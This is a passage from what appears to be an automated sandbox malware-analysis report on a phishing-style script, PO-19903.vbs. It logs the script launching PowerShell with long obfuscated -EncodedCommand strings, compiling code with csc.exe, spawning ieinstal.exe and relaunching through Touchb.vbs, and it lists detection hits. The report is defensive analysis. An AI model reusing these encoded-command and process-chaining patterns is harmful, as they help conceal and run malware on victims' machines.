BQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcwJump to behavior
    Very long command line found
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 17348
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 17348Jump to behavior
    Source: 00000001.00000003.3931911051.0000018888A71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0505E8272_2_0505E827
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0505E8582_2_0505E858
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E3AF02_2_085E3AF0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E51402_2_085E5140
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E27722_2_085E2772
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085EDB202_2_085EDB20
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E51402_2_085E5140
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E37982_2_085E3798
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08636F582_2_08636F58
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086330B02_2_086330B0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0863309E2_2_0863309E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086758E02_2_086758E0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086781292_2_08678129
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086781382_2_08678138
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087478882_2_08747888
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087400402_2_08740040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087400122_2_08740012
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0874B1EF2_2_0874B1EF
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0874B2102_2_0874B210
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F91402_2_087F9140
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087FF2982_2_087FF298
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F3C982_2_087F3C98
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F3C8A2_2_087F3C8A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F609422_2_08F60942
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F62A902_2_08F62A90
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F61CC82_2_08F61CC8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F6C8F02_2_08F6C8F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F6E8A82_2_08F6E8A8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0867C7412_2_0867C741
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess Stats: CPU usage > 98%
    Source: PO-19903.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dllJump to behavior
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBE